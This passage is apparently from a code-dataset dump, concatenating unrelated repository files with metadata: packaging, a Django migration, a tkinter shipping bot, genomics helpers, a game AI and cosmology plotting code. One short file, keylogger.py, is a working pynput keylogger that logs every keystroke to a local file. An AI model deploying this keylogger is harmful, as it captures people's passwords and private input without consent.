download_url='http://www.schwarz.eu/opensource/projects/trac_dev_platform/download/%s' % version,
license='MIT',
install_requires=['Trac >= 0.11'],
extras_require={'BeautifulSoup': 'BeautifulSoup'},
tests_require=['nose'],
test_suite = 'nose.collector',
zip_safe=False,
packages=setuptools.find_packages(exclude=['tests']),
include_package_data=True,
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Framework :: Trac',
],
)
| 31.078947
| 101
| 0.653683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 679
| 0.574936
|
3c78adc10fdbecc0bce8f85ff740740007a63985
| 276
|
py
|
Python
|
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
keylogger.py
|
ReLRail/project-touhou
|
fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9
|
[
"MIT"
] | null | null | null |
from pynput.keyboard import Key, Listener
import logging
logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
| 23
| 102
| 0.735507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.144928
|
3c797bad94039032f3ec8a0956509b976eb165dd
| 1,372
|
py
|
Python
|
app/core/migrations/0007_order.py
|
ifiokeyo/RecipeAPI
|
8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974
|
[
"MIT"
] | null | null | null |
app/core/migrations/0007_order.py
|
ifiokeyo/RecipeAPI
|
8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974
|
[
"MIT"
] | null | null | null |
app/core/migrations/0007_order.py
|
ifiokeyo/RecipeAPI
|
8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.6 on 2019-11-02 09:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('core', '0006_auto_20191102_0706'),
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
('size', models.CharField(choices=[('L', 'Large'), ('M', 'Medium'), ('S', 'small')], default='S', max_length=1)),
('quantity', models.PositiveIntegerField(default=1, help_text='number of pizza-box')),
('status', models.CharField(choices=[('P', 'Pending'), ('I', 'In-progress'), ('DE', 'Done'), ('DL', 'Delivered')], default='P', max_length=2)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orders', to=settings.AUTH_USER_MODEL)),
('pizza_flavour', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orders', to='core.Pizza')),
],
),
]
| 45.733333
| 159
| 0.618076
| 1,201
| 0.875364
| 0
| 0
| 0
| 0
| 0
| 0
| 303
| 0.220845
|
3c7b515ae39c770bf0370e05e2c3d7ec44f6e7fd
| 2,687
|
py
|
Python
|
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
import datetime
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
import functools
# import pathlib
from conflista import Bot
from salvacode import Salvar
from escreve import escreve
from geraqrcode import Gerar
date = datetime.date.today()
jan = Tk()
jan.title("Bot Mercado Envios")
jan.geometry("800x300")
jan.configure(background="#2b2b2b")
jan.resizable(width=False, height=False)
jan.iconbitmap(default="C:\programas\Programaçâo\GitHub\Bot-ML\Bot-ML\images\LogoIcon.ico")
logo = PhotoImage(file="C:\programas\Programaçâo\GitHub\Bot-ML\Bot-ML\images\logo.png")
messagebox.showinfo("Hello World !", "Seja Bem-Vindo ")
LeftFrame = Frame(jan, width=220, height=500, bg="#FF8C00", relief="raise")
LeftFrame.pack(side=LEFT)
RightFrame = Frame(jan, width=575, height=500, bg="#4f4f4f", relief="raise")
RightFrame.pack(side=RIGHT)
Caixas = Label(RightFrame, text="Total De Caixas:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Caixas.place(x=5, y=10)
CaixasEntry = ttk.Entry(RightFrame, width=53)
CaixasEntry.place(x=230, y=25)
Lote = Label(RightFrame, text="Nº Do Lote:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Lote.place(x=5, y=75)
LoteEntry = ttk.Entry(RightFrame, width=53)
LoteEntry.place(x=230, y=90)
Valores = Label(RightFrame, text="Codigos Lidos: ", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Valores.place(x=5, y=140)
ValoresEntry = Text(RightFrame, width=40, height=5)
# ValoresEntry.config(state=state)
ValoresEntry.place(x=230, y=155)
# file = open(f'C:\programas\Programaçâo\GitHub\{date} QR-BarCode-Unity.txt', 'w+')
# file = open(f'{date} QR-BarCode-Unity', 'w+')
def PegaLista():
try:
Caixas = CaixasEntry.get()
Valores = ValoresEntry.get('1.0', END)
QuantCaixas = int(Caixas)
Lista = Valores
# Lista = Lista.replace(',+',',')
Lista = Lista.split(',+')
QuantLista = len(Lista)
if QuantCaixas == QuantLista:
try:
escreve(Bot, Lista, date, Salvar)
Gerar(Lista, LoteEntry, contador=0)
except:
messagebox.showerror("Erro !", "Falha Na Função (escreve)")
else:
messagebox.showerror("Erro !", "Seu Total de Caixas Não Bate Com Seus Codigos !")
except:
messagebox.showerror("Erro !", "Por Favor Coloque Os Valores Nos Campos !")
ConfButton = ttk.Button(RightFrame, text="Adicionar Lista", width= 30, command=PegaLista)
ConfButton.place(x=5, y=190)
jan.mainloop()
| 26.60396
| 106
| 0.671381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 768
| 0.284761
|
3c7b6e7f1356932087387fb61f2acb5391ed0b70
| 943
|
py
|
Python
|
src/data/make_atac.py
|
mguo123/pan_omics
|
e1cacd543635b398fb08c0b31d08fa6b7c389658
|
[
"MIT"
] | null | null | null |
src/data/make_atac.py
|
mguo123/pan_omics
|
e1cacd543635b398fb08c0b31d08fa6b7c389658
|
[
"MIT"
] | null | null | null |
src/data/make_atac.py
|
mguo123/pan_omics
|
e1cacd543635b398fb08c0b31d08fa6b7c389658
|
[
"MIT"
] | null | null | null |
"""
process_atac.py
Margaret Guo
04/15/2020
footprinting (.bed) --> csv)
notebooks
- make_hichip_df-withsnps-cancer-only
"""
#### FIX FOR HOCO
def footprinting_to_df(footprinting_file):
footprinting_df = pd.read_table(footprinting_file,header=None)
footprinting_df.columns = ['chr', 'start', 'end', 'motif', 'score', 'strand', 'other']
temp = footprinting_df.motif.str.split('(') #i.e. remove (var.2)
temp = temp.apply(lambda x: x[0])
temp = temp.str.split('.')
footprinting_df['motif_abbr'] = temp.apply(lambda x: x[-1])
return footprinting_df
def atac_to_df(atac_narrowPeak_file):
atac_df = pd.read_table(atac_narrowPeak_file,header=None)
atac_df.columns = ['chr', 'start', 'end']
atac_df = atac_df.groupby(atac_df.columns.tolist()).size().reset_index().rename(columns={0:'count'})
atac_df['region'] = atac_df.apply(lambda row: '_'.join(row.values.astype(str)), axis=1)
return atac_df
| 29.46875
| 104
| 0.69035
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 267
| 0.283139
|
3c7b9bebae1fcd81af0109ae86287f833fb440e9
| 834
|
py
|
Python
|
waimai/libs/login.py
|
xucheng11/test
|
2987d34823825798bffac3cfb30cadab42dae998
|
[
"MulanPSL-1.0"
] | null | null | null |
waimai/libs/login.py
|
xucheng11/test
|
2987d34823825798bffac3cfb30cadab42dae998
|
[
"MulanPSL-1.0"
] | null | null | null |
waimai/libs/login.py
|
xucheng11/test
|
2987d34823825798bffac3cfb30cadab42dae998
|
[
"MulanPSL-1.0"
] | null | null | null |
"""
-------------------------------------------------
# @Project :外卖系统
# @File :login
# @Date :2021/8/1 18:16
# @Author :小成
# @Email :1224069978
# @Software :PyCharm
-------------------------------------------------
"""
import hashlib,copy,requests
from conf.host import *
def get_md5(password):
md5 = hashlib.md5()
md5.update(password.encode("utf-8"))
return md5.hexdigest()
class Login:
def login(self,indata,getToken=False):
url = f"{Host}/account/sLogin"
pyaload = copy.copy(indata)
pyaload["password"]=get_md5(indata["password"])
res = requests.post(url,data=pyaload)
print(res)
if getToken==False:
return res.json()
else:
return res.json()["data"]["token"]
if __name__ == '__main__':
print(Login().login(user))
| 25.272727
| 55
| 0.52518
| 370
| 0.437352
| 0
| 0
| 0
| 0
| 0
| 0
| 319
| 0.377069
|
3c7be908e5d846fc839b0269f1d2587bd74e3afb
| 409
|
py
|
Python
|
identities.py
|
Nandan-18/Algebraic-Identites
|
7ba979fbddbf1d487e728ed41aafd1eed5e3e100
|
[
"MIT"
] | null | null | null |
identities.py
|
Nandan-18/Algebraic-Identites
|
7ba979fbddbf1d487e728ed41aafd1eed5e3e100
|
[
"MIT"
] | null | null | null |
identities.py
|
Nandan-18/Algebraic-Identites
|
7ba979fbddbf1d487e728ed41aafd1eed5e3e100
|
[
"MIT"
] | null | null | null |
# Supporting Module
# identities.py
def exp1(a, b):
return a ** 2 + 2 * a * b + b ** 2
def exp2(a, b):
return a ** 2 - 2 * a * b + b ** 2
def exp3(a, b):
return (a + b) * (a - b)
def exp4(a, b):
return (a + b) ** 2 - 2 * a * b
def exp5(a, b):
return a ** 3 + 3 * a ** 2 * b + 3 * a * b ** 2 + b ** 3
def exp6(a, b):
return a ** 3 - 3 * a ** 2 * b + 3 * a * b ** 2 - b ** 3
| 15.148148
| 60
| 0.405868
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.08313
|
3c7e63e11d96ab3935b8bb543acdf655bcf3abc1
| 14,296
|
py
|
Python
|
betsy.py
|
animeshsagar/Betsy
|
5cc4ca126fe56803696967b59a9ace61ae7e3f7b
|
[
"MIT"
] | null | null | null |
betsy.py
|
animeshsagar/Betsy
|
5cc4ca126fe56803696967b59a9ace61ae7e3f7b
|
[
"MIT"
] | null | null | null |
betsy.py
|
animeshsagar/Betsy
|
5cc4ca126fe56803696967b59a9ace61ae7e3f7b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# Design Decisions
# Heuristic : Heuristic tries to maximize the pieces of that particular player on top n rows
# Min-Max : Min-Max algorithm has been used
# IDS : Iterative deepening search has been used to move down the tree(depth:100)
# No Time Constrain : No time constrain has been taken.Instead the program prints move iteratively as it goes down the depth
# Dynamic Tree : Tree has been built dynamically to avoid recomputations
from itertools import combinations
import copy
from random import randrange, sample
import sys
import string
import Queue as queue
import sys
import time
n = int(sys.argv[1])
initial = sys.argv[3]
minutes = int(sys.argv[4])
move_person = sys.argv[2]
temp_n = n
# print initial
# n = 3
start = [[0 for x in range(n)] for y in range(n+3)]
count = 0
for i in range(n+3-1,-1,-1):
for j in range(0,n):
start[i][j] = initial[count]
count = count + 1
#print start
#start[5][0] = 'x'
#print start
#test = [['x', 'o', 'x'], ['x', 'x', 'x'], ['o', 'o', 'o'], ['x', 'x', '.'], ['.', '.', '.'], ['.', '.', '.']]
# move_person = 'o'
#Successor Function
def succesor(state):
result = []
if move_person == 'x':
mv = 'x'
else:
mv = 'o'
for i in range(0,n):
flag = 0
for j in range(0,n+3):
if(state[j][i] == '.'):
flag = 1
if flag == 1:
succ = copy.deepcopy(state)
succ[j][i] = mv
result.append((i+1,succ))
# print 'Inside'
break
# print result
for i in range(0,n):
succ = copy.deepcopy(state)
for m in range(n+3-1,-1,-1):
if(succ[m][i] != '.'):
top = m
top_elem = succ[m][i]
# print top,top_elem,m,i
break
elif(succ[0][i] == '.'):
top = 0
top_elem = succ[0][i]
break
temp = succ[0][i]
for j in range(0,n+3-1):
succ[j][i] = state[j+1][i]
succ[top][i] = temp
result.append((-(i+1),succ))
# for elem in result:
# print '\n'
# for elem1 in elem[1]:
# print elem1
# print '\n'
return result
# Check Goal State
def is_goal(state):
succ = copy.deepcopy(state)
for i in range(n,n+3):
if all(succ[i][j] == 'x' for j in range(0,n)) is True:
return True
if all(succ[i][j] == 'o' for j in range(0,n)) is True:
return True
for j in range(0,n):
if all(succ[i][j] == 'x' for i in range(n,n+3)) is True:
return True
if all(succ[i][j] == 'o' for i in range(n,n+3)) is True:
return True
if all(succ[i][i-n] == 'x' for i in range(n,n+3)) is True:
return True
if all(succ[i][i-n] == 'o' for i in range(n,n+3)) is True:
return True
if all(succ[n+3-1-i][i] == 'x' for i in range(n-1,-1,-1)) is True:
return True
if all(succ[n+3-1-i][i] == 'o' for i in range(0,n)) is True:
return True
return False
def heuristic(state):
xcount = 0
ycount = 0
for i in range(3,n+3):
for j in range(0,n):
if(state[i][j] == 'x'):
xcount = xcount + 1
if(state[i][j] == 'o'):
ycount = ycount + 1
return xcount - ycount
class Node(object):
def __init__(self, data):
self.data = data
self.children = []
self.father_i = -1
self.father_k = -1
self.current_max = -1000
self.current_min = 1000
self.move = 0
def add_child(self, obj):
self.children.append(obj)
#p = Node(test)
#for succ in succesor(test):
# p.add_child(succ[1])
#for c in p.children:
# print c
# Building Trees Dynamically
def solve(state):
# level = [[0 for x in range(0,10)] for y in range(0,10)]
# print state
# level[0][0] = Node(state)
# print level[0][0].data
# print level[0]
global move_person
global temp_n
temp_person = move_person
for i in range(2,100,2):
level = [[0 for x in range(0,10)] for y in range(0,10)]
level[0][0] = Node(state)
for j in range(0,i,1):
if j%2 == 0:
move_person = 'x'
else:
move_person = 'o'
# print level[j]
count = 0
for elem in level[j]:
count = count + 1
if elem != 0:
# print elem.data
for succ in succesor(elem.data):
# print succ
p = Node(succ[1])
p.father_i = j
p.father_k = count-1
p.move = succ[0]
elem.add_child(p)
level[j+1].append(p)
if temp_person == 'x':
for elem in level[i]:
if elem!= 0:
elem.current_max = heuristic(elem.data)
else:
for elem in level[i]:
if elem!= 0:
elem.current_min = heuristic(elem.data)
if temp_person == 'x':
for m in range(i,0,-1):
for elem in level[m]:
if elem != 0:
if m%2 == 0:
if level[elem.father_i][elem.father_k].current_min > elem.current_max:
level[elem.father_i][elem.father_k].current_min = elem.current_max
else:
if level[elem.father_i][elem.father_k].current_max < elem.current_min:
level[elem.father_i][elem.father_k].current_max = elem.current_min
else:
for m in range(i,0,-1):
for elem in level[m]:
if elem != 0:
if m%2 == 0:
if level[elem.father_i][elem.father_k].current_max < elem.current_min:
level[elem.father_i][elem.father_k].current_max = elem.current_min
else:
if level[elem.father_i][elem.father_k].current_min > elem.current_max:
level[elem.father_i][elem.father_k].current_min = elem.current_max
if temp_person == 'x':
find = level[0][0].current_max
for elem in level[1]:
if elem!=0 and elem.current_min == find:
# print elem.data
# print 'Move:'
# print elem.move
# print elem.move,
str = ''
for i in range(temp_n+3-1,-1,-1):
for j in range(0,n):
str = str + elem.data[i][j]
print elem.move,
print str.replace(" ", "")
break
else:
find = level[0][0].current_min
for elem in level[1]:
if elem!=0 and elem.current_max == find:
# print elem.data
# print 'Move:'
# print elem.move,
# print ' ',
str = ''
for i in range(temp_n+3-1,-1,-1):
for j in range(0,n):
str = str + elem.data[i][j]
print elem.move,
print str.replace(" ", "")
break
# for elem in level[4]:
# if elem!=0:
# print elem.data,elem.current
solve(start)
| 54.773946
| 204
| 0.25007
| 307
| 0.021475
| 0
| 0
| 0
| 0
| 0
| 0
| 8,397
| 0.587367
|
3c80ebcea041e63107d9067c90a11c330c458c26
| 503
|
py
|
Python
|
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | 1
|
2018-07-19T10:34:46.000Z
|
2018-07-19T10:34:46.000Z
|
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | null | null | null |
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | null | null | null |
def binary(n):
if n not in binary.memoize:
binary.memoize[n] = binary(n//2) + str(n % 2)
return binary.memoize[n]
binary.memoize = {0: '0', 1: '1'}
def get_binary_l(n, l):
bin_str = binary(n)
return (l - len(bin_str))*'0' + bin_str
n_f = 9
with open('command_lines.txt', 'w') as out:
for i in range(2**n_f):
out.write('/home/nversbra/anaconda3/envs/py36/bin/python random_forest.py dida_posey_to_predict.csv 100 50 1-1-1 %s\n' % get_binary_l(i, n_f))
| 33.533333
| 151
| 0.61829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 139
| 0.276342
|
3c81582355ba3220bcb59a6354b57fa7be7a46e7
| 17,422
|
py
|
Python
|
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
"""
Functions for plotting the signal to noise per angular bin.
"""
import math
import os.path
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import angular_binning.like_cf_gauss as like_cf
DEG_TO_RAD = math.pi / 180.0
def plot_cl_cf(diag_she_cl_path, she_nl_path, lmin, lmax, theta_min, theta_max, n_theta_bin, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_dir=None):
"""
Produce plots of signal-to-noise per element for both the unbinned power spectrum and the binned correlation
function, using data produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
she_nl_path (str): Path to shear noise power spectrum as a text file.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_theta_bin (int): Number of theta bins.
survey_area_sqdeg (float): Survey area in square degrees, used to calculate the noise variance for the
correlation function.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin, used to calculate
the noise variance for the correlation function.
sigma_e (float): Intrinsic ellipticity dispersion per component, used to calculate the noise variance for the
correlation function.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_dir (str, optional): Directory to save the two plots into, if supplied. If not supplied, plots are
displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Add noise
n_ell = lmax - lmin + 1
nl = np.loadtxt(she_nl_path, max_rows=n_ell)
cls_ = cls_nonoise + nl
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
assert cls_.shape == (n_samp, n_ell)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
fid_cl = cls_[fid_idx, :]
ell = np.arange(lmin, lmax + 1)
fid_cl_err = np.sqrt(2 * fid_cl ** 2 / (2 * ell + 1))
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
# Plot all power spectra and the difference from the fiducial model
cl_fac = ell * (ell + 1) / (2 * np.pi)
for cl, dist_sig in zip(cls_, dist_sigma):
ax[0].plot(ell, cl_fac * cl, alpha=.5, color=colour.to_rgba(dist_sig))
ax[1].plot(ell, (cl - fid_cl) / fid_cl_err, alpha=.5, color=colour.to_rgba(dist_sig))
# Add a few cosmic variance error bars
err_ell = np.array([500, 1000, 1500, 2000])
err_ell_idx = err_ell - lmin
ax[0].errorbar(err_ell, cl_fac[err_ell_idx] * fid_cl[err_ell_idx],
yerr=(cl_fac[err_ell_idx] * 0.5 * fid_cl_err[err_ell_idx]), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (C_\ell)}$')
# Labels, legend and colour bar
ax[1].set_xlabel(r'$\ell$')
ax[0].set_ylabel(r'$C_\ell \times \ell (\ell + 1) ~ / ~ 2 \pi$')
ax[1].set_ylabel(r'$(C_\ell - C_\ell^\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(C_\ell)}$')
ax[0].ticklabel_format(axis='y', style='sci', scilimits=(0, 0))
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cl_perl.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
# Calculate theta range
theta_bin_edges = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta_bin + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus, _ = like_cf.get_cl2cf_matrices(theta_bin_edges, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec = cl2cf_22plus @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus = cl2cf_22plus[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf = cl2cf_22plus @ fid_cl + stabl_vec
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise = np.einsum('il,jl,l->ij', cl2cf_22plus, cl2cf_22plus, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta = np.cos(theta_bin_edges)
bin_area_new = 2 * np.pi * -1 * np.diff(cos_theta)
npairs = 0.5 * survey_area_sterad * bin_area_new * (gals_per_sterad ** 2) # Friedrich et al. eq 65
fid_cf_noise_var = 2 * sigma_e ** 4 / npairs
fid_cf_err = np.sqrt(np.diag(fid_cf_cov_nonoise) + fid_cf_noise_var)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
bin_edges_deg = np.degrees(theta_bin_edges)
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf = cl2cf_22plus @ cl + stabl_vec
cf_diff = (cf - fid_cf) / fid_cf_err
line_args = {'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0].step(bin_edges_deg, np.pad(cf, (0, 1), mode='edge'), where='post', **line_args)
ax[1].step(bin_edges_deg, np.pad(cf_diff, (0, 1), mode='edge'), where='post', **line_args)
# Add error bars
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
ax[0].errorbar(bin_centres_deg, fid_cf, yerr=(0.5 * fid_cf_err), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (\xi+)}$')
# Labels, legend and colour bar
plt.xscale('log')
ax[1].set_xlabel(r'$\theta$ (deg)')
ax[0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cf_perbin.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def plot_cf_nbin(diag_she_cl_path, lmin, lmax, theta_min, theta_max, n_bin_1, n_bin_2, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_path=None):
"""
Plots signal-to-noise per bin for the full-sky correlation function for two numbers of bins side-by-side, using data
produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_bin_1 (int): Number of theta bins in the left panel.
n_bin_2 (int): Number of theta bins in the right panel.
survey_area_sqdeg (float): Survey area in square degrees.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin.
sigma_e (float): Intrinsic ellipticity dispersion per component.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_path (str, optional): Path to save the plot, if supplied. If not supplied, plot is displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
ell = np.arange(lmin, lmax + 1)
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Calculate theta range
theta_bin_edges_1 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_1 + 1)
theta_bin_edges_2 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_2 + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus_1, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_1, lmin, l_extrap_to)
_, cl2cf_22plus_2, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_2, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec_1 = cl2cf_22plus_1 @ fid_cl_extrap
stabl_vec_2 = cl2cf_22plus_2 @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus_1 = cl2cf_22plus_1[:, :(lmax - lmin + 1)]
cl2cf_22plus_2 = cl2cf_22plus_2[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf_1 = cl2cf_22plus_1 @ fid_cl + stabl_vec_1
fid_cf_2 = cl2cf_22plus_2 @ fid_cl + stabl_vec_2
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise_1 = np.einsum('il,jl,l->ij', cl2cf_22plus_1, cl2cf_22plus_1, fid_cl_var)
fid_cf_cov_nonoise_2 = np.einsum('il,jl,l->ij', cl2cf_22plus_2, cl2cf_22plus_2, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta_1 = np.cos(theta_bin_edges_1)
cos_theta_2 = np.cos(theta_bin_edges_2)
bin_area_1 = 2 * np.pi * -1 * np.diff(cos_theta_1)
